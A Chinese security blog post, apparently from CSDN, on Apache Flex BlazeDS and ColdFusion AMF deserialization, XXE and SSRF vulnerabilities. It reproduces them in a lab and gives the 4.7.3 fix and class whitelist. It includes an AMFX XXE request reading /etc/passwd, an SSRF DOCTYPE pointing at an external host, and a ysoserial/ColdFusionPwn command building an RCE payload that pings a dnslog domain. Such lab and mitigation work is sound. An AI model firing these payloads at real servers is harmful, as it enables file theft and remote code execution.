AMF反序列化/XXE/SSRF漏洞

最新推荐文章于 2022-04-27 08:09:42 发布
最新推荐文章于 2022-04-27 08:09:42 发布
阅读量3.7k 收藏 2
点赞数
分类专栏: java 安全 Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/110629969
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

参考:
CVE-2017-5641

Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default.

Adobe/Apache Flex Java library

历史原因:

Flex BlazeDS by Adobe (retired, contributed Flex to the Apache Software Foundation in 2011)

既然影响版本是<= 4.7.2,那么在IDEA里就可以选这个4.7.2的:
在这里插入图片描述
可以用这个maven依赖:

        <!-- https://mvnrepository.com/artifact/org.apache.flex.blazeds/flex-messaging-core -->
        <dependency>
            <groupId>org.apache.flex.blazeds</groupId>
            <artifactId>flex-messaging-core</artifactId>
            <version>4.7.2</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.flex.blazeds/flex-messaging-common -->
        <dependency>
            <groupId>org.apache.flex.blazeds</groupId>
            <artifactId>flex-messaging-common</artifactId>
            <version>4.7.2</version>
        </dependency>

附件

burp插件:
https://github.com/PortSwigger/amf-deserializer

JRMP利用成功:
在这里插入图片描述
但是没有可用的gadget,无法RCE。

尝试一下XXE吧:
https://codewhitesec.blogspot.com/2015/08/cve-2015-3269-apache-flex-blazeds-xxe.html

环境搭建参考:
AMF解析遇上XXE,BurpSuite也躺枪

目前BlazeDS已经无法从adobe下载:
https://stackoverflow.com/questions/32097474/blazeds-binary-latest-version-download-location

SSRF:
CVE-2015-5255

修复方法/缓解措施

升级到4.7.3

参考:
https://codewhitesec.blogspot.com/2017/04/amf.html
https://downloads.apache.org/flex/BlazeDS/4.7.3/RELEASE_NOTES
修复方式原文:

Starting with 4.7.3 BlazeDS Deserialization of XML is disabled completely per default
but can easily be enabled in your services-config.xml:

    <channels>
        <channel-definition id="amf" class="mx.messaging.channels.AMFChannel">
            <endpoint url="http://{server.name}:{server.port}/{context.root}/messagebroker/amf"
                      class="flex.messaging.endpoints.AMFEndpoint"/>
            <properties>
                <serialization>
                    <allow-xml>true</allow-xml>
                </serialization>
            </properties>
        </channel-definition>
    </channels>

Also we now enable the ClassDeserializationValidator per default to only allow
deserialization of whitelisted classes.

即4.7.3开始默认禁用了XML的反序列化,但是可以通过配置services-config.xml来启用。
并且默认开启了ClassDeserializationValidator只能反序列化白名单中的类:

    flex.messaging.io.amf.ASObject
    flex.messaging.io.amf.SerializedObject
    flex.messaging.io.ArrayCollection
    flex.messaging.io.ArrayList
    flex.messaging.messages.AcknowledgeMessage
    flex.messaging.messages.AcknowledgeMessageExt
    flex.messaging.messages.AsyncMessage
    flex.messaging.messages.AsyncMessageExt
    flex.messaging.messages.CommandMessage
    flex.messaging.messages.CommandMessageExt
    flex.messaging.messages.ErrorMessage
    flex.messaging.messages.HTTPMessage
    flex.messaging.messages.RemotingMessage
    flex.messaging.messages.SOAPMessage
    java.lang.Boolean
    java.lang.Byte
    java.lang.Character
    java.lang.Double
    java.lang.Float
    java.lang.Integer
    java.lang.Long
    java.lang.Object
    java.lang.Short
    java.lang.String
    java.util.ArrayList
    java.util.Date
    java.util.HashMap
    org.w3c.dom.Document

如果想配置某反序列化类,需要这样配置:

    <validators>
        <validator class="flex.messaging.validators.ClassDeserializationValidator">
            <properties>
                <allow-classes>
                    <class name="org.mycoolproject.*"/>
                    <class name="flex.messaging.messages.*"/>
                    <class name="flex.messaging.io.amf.ASObject"/>
                </allow-classes>
            </properties>
        </validator>
    </validators>

参考文档

2011年的博客,2016-06-11更新:

  • http://wouter.coekaerts.be/2011/amf-arbitrary-code-execution

  • https://codewhitesec.blogspot.com/2015/08/cve-2015-3269-apache-flex-blazeds-xxe.html

  • AMF与Flex BlazeDS漏洞

poc

[CVE-2009-3960] XXE BlazeDS<= 3.2

影响组件:
HTTPChannel servlet。具体的,是

“mx.messaging.channels.HTTPChannel”
“mx.messaging.channels.SecureHTTPChannel”

在这个包flex-messaging-common.jar里。
HTTPChannel 以AMFX格式的数据进行通信(就是AMF的XML格式)。
这个endpoints在这个文件Flex/WEB-INF/services-config.xml里定义。

默认HTTPChannel映射到了以下接口:

  • /messagebroker/http
  • /messagebroker/httpsecure
    不过不同的框架(比如BlazeDS, Adobe LiveCycle Data Services)会被映射到不同的路径。
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
  <body>
    <object type="flex.messaging.messages.CommandMessage">
      <traits>
        <string>body</string><string>clientId</string><string>correlationId</string>
        <string>destination</string><string>headers</string><string>messageId</string>
        <string>operation</string><string>timestamp</string><string>timeToLive</string>
      </traits><object><traits />
      </object>
      <null /><string /><string />
      <object>
        <traits>
          <string>DSId</string><string>DSMessagingVersion</string>
        </traits>
        <string>nil</string><int>1</int>
      </object>
      <string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
    </object>
  </body>
</amfx>

参考:

[CVE-2015-3269]XXE BlazeDS< 4.7.1

http://mail-archives.apache.org/mod_mbox/flex-users/201511.mbox/%3Cop.x8j4mv0bn9yd54@christofers-macbook-pro.local%3E

<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
[CVE-2015-5255]SSRF BlazeDS< 4.7.2

http://apache-flex-users.2333346.n4.nabble.com/CVE-2015-3269-Apache-Flex-BlazeDS-Insecure-Xml-Entity-Expansion-Vulnerability-td10976.html

<!DOCTYPE foo PUBLIC "-//VSR//PENTEST//EN"
"http://49.x.y.z:8888/protected-service"><foo>Some content</foo>
[CVE-2017-5641] 反序列化 BlazeDS< 4.7.3
[CVE-2017-3066]Adobe Coldfusion BlazeDS反序列化

影响范围:
Adobe ColdFusion 2016 Update 3 and earlier
Adobe ColdFusion 11 update 11 and earlier
ColdFusion 10 Update 22 and earlier

参考:

使用vulhub搭建CodeFusion环境,环境安装好之后是这样的:
在这里插入图片描述
密码是vulhub

77@ubuntu129:~/repos$ java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.8-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "ping 111.oqp5zz.dnslog.cn"  poc.amf
77@ubuntu129:~/repos$ ll poc.amf 
-rw-rw-r-- 1 77 77 1.8K Dec  8 04:23 poc.amf

利用成功,
在这里插入图片描述

响应这个:
在这里插入图片描述
看文本貌似用的是org.apache.axis2.util.MetaDataEntry这个gadget。检查日志:

docker exec -it 77d090756fb0 /bin/bash
tail -f /opt/coldfusion11/cfusion/logs/coldfusion-out.log

报错如下:

[BlazeDS]Error deserializing client message.
java.lang.RuntimeException: InvocationTargetException: java.lang.reflect.InvocationTargetException
	at org.apache.commons.beanutils.BeanComparator.compare(BeanComparator.java:165)
	at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	at java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	at java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	at java.util.PriorityQueue.readObject(PriorityQueue.java:795)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:483)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1896)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1801)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
	at org.apache.axis2.context.externalize.SafeObjectInputStream.readObjectOverride(SafeObjectInputStream.java:342)
	at org.apache.axis2.context.externalize.SafeObjectInputStream.readObject(SafeObjectInputStream.java:130)
	at org.apache.axis2.util.MetaDataEntry.readExternal(MetaDataEntry.java:319)
	at flex.messaging.io.amf.Amf3Input.readExternalizable(Amf3Input.java:491)
	at flex.messaging.io.amf.Amf3Input.readScriptObject(Amf3Input.java:420)
	at flex.messaging.io.amf.Amf3Input.readObjectValue(Amf3Input.java:152)
	at flex.messaging.io.amf.Amf3Input.readObject(Amf3Input.java:130)
	at flex.messaging.io.amf.Amf0Input.readObjectValue(Amf0Input.java:123)
	at flex.messaging.io.amf.Amf0Input.readObject(Amf0Input.java:94)
	at flex.messaging.io.amf.AmfMessageDeserializer.readObject(AmfMessageDeserializer.java:227)
	at flex.messaging.io.amf.AmfMessageDeserializer.readBody(AmfMessageDeserializer.java:206)
	at flex.messaging.io.amf.AmfMessageDeserializer.readMessage(AmfMessageDeserializer.java:126)
	at flex.messaging.endpoints.amf.SerializationFilter.invoke(SerializationFilter.java:145)
	at flex.messaging.endpoints.BaseHTTPEndpoint.service(BaseHTTPEndpoint.java:291)
	at flex.messaging.MessageBrokerServlet.service(MessageBrokerServlet.java:353)
	at coldfusion.flex.ColdFusionMessageBrokerServlet.service(ColdFusionMessageBrokerServlet.java:114)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:727)
	at coldfusion.bootstrap.BootstrapServlet.service(BootstrapServlet.java:89)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at coldfusion.filter.FlashRequestControlFilter.doFilter(FlashRequestControlFilter.java:71)
	at coldfusion.bootstrap.BootstrapFilter.doFilter(BootstrapFilter.java:46)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:422)
	at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1040)
	at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)
	at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:314)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:745)

如果没有这个类,则响应:

Cannot create class of type 'org.apache.axis2.util.MetaDataEntry'

org.jgroups.blocks.ReplicatedTree也类似。
在这里插入图片描述

caiqiiqi
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP 反序列化解码Flash AMF
04-03
从PHPAMF提取并修改测试可用的AMF反解代码 调用例子: $amf = new AMFObject($data); //$data为AMF数据 $deserializer = new AMFDeserializer($amf->rawData); $deserializer->deserialize($amf); $AMF = $deserializer->getAMFObject(); //解码结果
java amf3_Java AMF3 反序列化漏洞分析
weixin_39793420的博客
03-04 867
写在前面的话AMF(Action Message Format)是一种二进制序列化格式,之前主要是Flash应用程序在使用这种格式。近期,Code White发现有多个Java AMF库中存在目前,漏洞相关信息已上报至美国CERT(详情请参考美国CERT VU#307983)概述目前,Code White主要对以下几种热门的Java AMF实现:Flex BlazeDS by AdobeFlex ...
[CVE-2020-7200] HPE Systems Insight Manager (SIM) AMF反序列化RCE
公众号shadow sock7
12-22 974
参考: https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0 https://support.hpe.com/hpesc/public/docDisplay?docId=emr_na-c05350888 下载地址: https://support.hpe.com/hpesc/public/docDisplay?docId=em
flexAMF3中序列化和反序列化的Alias机制
iteye_9815的博客
12-01 158
很多人翻译Alias为“别名”,不太好,在金山词霸中还有另外一个意思“双面女间谍”,很形象。环境:服务器端使用java,客户端使用as3。 1)声明我的as3对象A是可以被强制转换为服务器端的java对象B的 在对象中使用 [RemoteClass(alias="B")] Java代码 1. public class A{ 2. .... 3...
AMFDSer-ngng:Burp Extender 插件,它将采用反序列化AMF 对象并使用 Xtream 库将它们编码为 XML
06-12
Burp Extender 插件,它将采用反序列化AMF 对象并使用库将它们编码为 XML。 基于 Khai Tran 的原创作品,所有 hail AMFDSer-ngng 还利用了 Kenneth Hill 的部分 Jmeter 源代码进行自定义 AMF 反序列化( )。 和...
amf解析,json解析 格式化
11-15
AMF(Action Message Format)是Adobe公司开发的一种二进制数据序列化格式,常用于Flash与服务器之间的数据交换。AMF格式提供了高效的数据传输,它能够将复杂的数据结构如对象、数组、日期等编码为二进制流,从而...
blazeds.zip_FlashMX/Flex源码_Flex_
08-11
BlazDS会自动处理这些接口的序列化和反序列化,使得数据能够顺畅地在Flex客户端和Java服务器之间传递。 在Flex项目中,可以使用BlazDS提供的事件监听器来处理服务调用的成功、错误和进度等状态。这样,当Flex应用...
cc.rar_FlashMX/Flex源码_Java_
08-11
Flex应用通常通过AMF(Action Message Format)或SOAP等协议与Java应用服务器(如Apache Tomcat、JBoss、GlassFish)进行数据交换。Java开发者可以使用Spring、Hibernate等框架构建服务端逻辑,提供Flex客户端所需的...
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)
EC_Carrot的博客
05-20 563
漏洞背景 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 影响范围 Adobe ColdFusion (2016 release) Update 3及之前的版本 ColdFusion 11 Update 11及之前的版本 ColdFus
十多年前的 Adobe ColdFusion 漏洞被用于勒索攻击
smellycat000的专栏
09-22 257
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全公司 Sophos 表示,Adobe 公司在十多年前修复的两个 ColdFusion 漏洞遭攻击。Sophos 最近调查发现身份...
AMF解析遇上XXE,BurpSuite也躺枪
swordheart的博客
04-27 593
0x00 来源 此文译自http://www.agarri.fr/kom/archives/2015/12/17/amf_parsing_and_xxe/index.html、http://codewhitesec.blogspot.sg/2015/08/cve-2015-3269-apache-flex-blazeds-xxe.html,并做了适当的补充。 原作者(以下的“作者”或“原作者”均表示前一篇原始博文作者)最近在把弄两个解析AMF(Action Message Format)的第三方库:Bla
Some vul in Cold Fusion
weixin_34128411的博客
01-25 120
ColdFusion 9.0.1 and Below Path Traversal Vulnerability (APSB10-18, CVE-2010-2861) ColdFusion 9 Solr Service Exposed (APSB10-04, CVE-2010-0185) ColdFusion 9, 8, 7 BlaseDS...
BlazeDS介绍
hgy82的专栏
08-09 1724
<br />最近, 公司又整了一套FLEX的框架, 没想到几年后又捡起了FLEX,不过现在已经是4.0了, 今天又学习了一下BlazeDS,   所兴将好的介绍记录下来. 最简单的理解是:它就是一个处理系统间消息格式化的...具体的看下面介绍.<br /> <br /> <br />在日常的RIA开发中,Flex或者基于纯Actionscript3的RIA应用非常普遍。 在客户端与服务端的交互中,大家用的比较多的几种方式是:纯文本内容,XML,JSON等。 不过,随着Adobe将AMF协议开源,越来越多的人
SWPUCTF2019web题复现
bmth666的博客
04-05 1203
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
Linux CVE-2009-0029 漏洞解析
柠檬C的专栏
03-31 7001
首先看什么是CVE-2009-0029漏洞: The ABI in the Linux kernel 2.6.28 and earlier on s390, powerpc, sparc64, and mips 64-bit platforms requires that a 32-bit argument in a 64-bit register was properly sign exten
漏洞学习之CVE-2009-1330 Easy RM to MP3 Converter
ATree的博客
11-18 934
最近学习了有关漏洞方面的知识,了解虽不是很深刻,但是也还算是入了坑,稍微知道点,别人在谈论时,也可以接上话了。 目标软件是Easy Rm to MP3 Converter,根据CVE上的公示可知,它的漏洞是在对.m3u音频列表文件解析出了问题,通过了解可知,.m3u文件是文本文件,这就给我们比较大的发展空间了,非常方便的构造一个这样的文件然后去触发这个漏洞产生。我们在构造这个文件时需要注
python3 + wxpython 实现基于 metasploit 的安全扫描工具
kevinhanser
08-02 1736
python3 + wxpython 实现 基于 metasploit 的安全扫描工具 2018年8月2日17:02:00 【原创】 1. 运行环境 最近打算使用 python3 写一个图形化的氨曲南扫描工具,主要使用 metasploit 另外我的环境使用了 wxpython 图形化模块,安装方法也很简单 pip install wxpython wxpython 已经更新...
php 解析 amf
最新发布
10-06
PHP 解析 AMF(Action Message Format)可以使用 open-flash-remoting 扩展来实现。Open-flash-remoting 是一个用于 AMF 解析和处理的扩展,可以让 PHP 与 Flash 进行数据交互。 要解析 AMF 数据,首先需要安装 open-flash-remoting 扩展。可以通过以下步骤来完成安装: 1. 下载 open-flash-remoting 可执行程序(.dll 文件)对应的版本,确保与 PHP 的版本兼容。 2. 找到 PHP 安装目录下的 ext 文件夹,将下载的 .dll 文件复制到该文件夹中。 3. 打开 PHP 的配置文件(php.ini),找到并编辑以下行: ```ini ; Dynamic Extensions ; ... ; ... extension=php_open_flash remoting.dll ``` 4. 保存并关闭配置文件。 5. 重启 Web 服务器(例如 Apache)。 在成功安装了 open-flash-remoting 扩展后,就可以通过以下步骤来解析 AMF 数据: 1. 接收从 Flash 发送的 AMF 数据。 2. 使用 open-flash-remoting 扩展提供的函数,如 amf_decode(),来解析接收到的 AMF 数据。 3. 处理解析后的数据,根据数据类型和结构进行相应的操作,如存储到数据库、生成 HTML 内容等。 4. 将处理后的数据返回给 Flash 或其他需要的应用程序。 PHP 解析 AMF 数据的好处是,它可以实现更高效的数据交互,减少数据传输量和处理时间。AMF 是一种二进制格式,比起 XML 或 JSON 格式,AMF 的数据量更小,解析速度更快,适用于需要频繁传输大量数据的应用场景,如在线游戏、聊天应用等。 总之,通过安装 open-flash-remoting 扩展,我们可以在 PHP 中解析和处理 AMF 数据,实现高效的数据交互。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值